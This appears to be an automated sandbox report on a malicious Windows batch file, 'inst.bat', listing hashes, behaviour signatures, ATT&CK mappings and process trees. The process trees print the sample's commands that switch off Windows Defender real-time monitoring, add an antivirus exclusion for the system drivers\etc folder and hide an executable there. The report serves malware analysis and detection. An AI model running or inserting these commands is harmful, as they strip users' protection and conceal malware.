cf083f834a6dbcf2c3e91f705fa4188fc590261ee4111e3eb61daf3e3b6ca6c8

Analysis

max time kernel
22s
max time network
17s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06-10-2024 13:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

inst.bat
Size

713B
MD5

ba7d5c2094c82a1cfa6a2db0797b53fe
SHA1

289145bbb2d21f3098b9870a0eac65024172b3a5
SHA256

cf083f834a6dbcf2c3e91f705fa4188fc590261ee4111e3eb61daf3e3b6ca6c8
SHA512

eabcc7e8cd57a62f52595c731c3ab52bfd6de889535ba509f092cd299b2f73dc0ff3b407b33e6ea48fbfeaa48f2ed39d071424587b418b2640801a8ca95fd5bb

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1512	powershell.exe
2832	powershell.exe
3012	powershell.exe
2696	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1512	powershell.exe
2696	powershell.exe
2832	powershell.exe
3012	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2432 wrote to memory of 588	2432	cmd.exe	32
PID 2432 wrote to memory of 588	2432	cmd.exe	32
PID 2432 wrote to memory of 588	2432	cmd.exe	32
PID 588 wrote to memory of 2016	588	net.exe	33
PID 588 wrote to memory of 2016	588	net.exe	33
PID 588 wrote to memory of 2016	588	net.exe	33
PID 2432 wrote to memory of 1512	2432	cmd.exe	34
PID 2432 wrote to memory of 1512	2432	cmd.exe	34
PID 2432 wrote to memory of 1512	2432	cmd.exe	34
PID 2432 wrote to memory of 2696	2432	cmd.exe	35
PID 2432 wrote to memory of 2696	2432	cmd.exe	35
PID 2432 wrote to memory of 2696	2432	cmd.exe	35
PID 2432 wrote to memory of 2836	2432	cmd.exe	36
PID 2432 wrote to memory of 2836	2432	cmd.exe	36
PID 2432 wrote to memory of 2836	2432	cmd.exe	36
PID 1344 wrote to memory of 2344	1344	cmd.exe	39
PID 1344 wrote to memory of 2344	1344	cmd.exe	39
PID 1344 wrote to memory of 2344	1344	cmd.exe	39
PID 2344 wrote to memory of 2740	2344	net.exe	40
PID 2344 wrote to memory of 2740	2344	net.exe	40
PID 2344 wrote to memory of 2740	2344	net.exe	40
PID 1344 wrote to memory of 2832	1344	cmd.exe	41
PID 1344 wrote to memory of 2832	1344	cmd.exe	41
PID 1344 wrote to memory of 2832	1344	cmd.exe	41
PID 1344 wrote to memory of 3012	1344	cmd.exe	42
PID 1344 wrote to memory of 3012	1344	cmd.exe	42
PID 1344 wrote to memory of 3012	1344	cmd.exe	42
PID 1344 wrote to memory of 616	1344	cmd.exe	43
PID 1344 wrote to memory of 616	1344	cmd.exe	43
PID 1344 wrote to memory of 616	1344	cmd.exe	43

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2836	attrib.exe
616	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\inst.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32\drivers\etc'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2696
- C:\Windows\system32\attrib.exe
  attrib +h +s "C:\windows\system32\drivers\etc\rizzing.exe"
  2⤵
  - Views/modifies file attributes
  PID:2836

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1344
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32\drivers\etc'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3012
- C:\Windows\system32\attrib.exe
  attrib +h +s "C:\windows\system32\drivers\etc\rizzing.exe"
  2⤵
  - Views/modifies file attributes
  PID:616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1d3189a0f6d21a70ee21eee754cc13f3

SHA1
e1dc04af59326de12f4801dc3038a2aaee037351

SHA256
33cabb3b0f84f8a6a8f3ec2b8b83d339255184c3aca2ccbca206b8725f79bea3

SHA512
66ca1a136c861420fd6b6c95f9039966944a3fccc31da6a81919d61333c155544be39c6149de1c3449fee4037607b5ca710685a94e79d22831f07662cfe420af

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
cacc82dc7bdd9f5ecfbce0ad9c0c8d22

SHA1
9795fe2a22505e0d4548caae9b273d43cdaa25dc

SHA256
1ddb40fa16f17267e7c15e60015754f4af9e1eb921d709071d626c99e5afbc51

SHA512
8a4b0f955889bf99917e5817c8264bbf67efede945965b4baf9459353e4f14826a882eda17458622f838cd32efd8c72072a535235cce9f08e5bf44d34428412b

Download Submit
memory/1512-10-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-7-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-8-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-6-0x0000000002770000-0x0000000002778000-memory.dmp

Filesize
32KB

Download
memory/1512-11-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-12-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-9-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-4-0x000007FEF5ABE000-0x000007FEF5ABF000-memory.dmp

Filesize
4KB

Download
memory/1512-5-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2696-18-0x000000001B890000-0x000000001BB72000-memory.dmp

Filesize
2.9MB

Download
memory/2696-19-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/2832-26-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

Filesize
2.9MB

Download
memory/2832-27-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/3012-33-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/3012-34-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download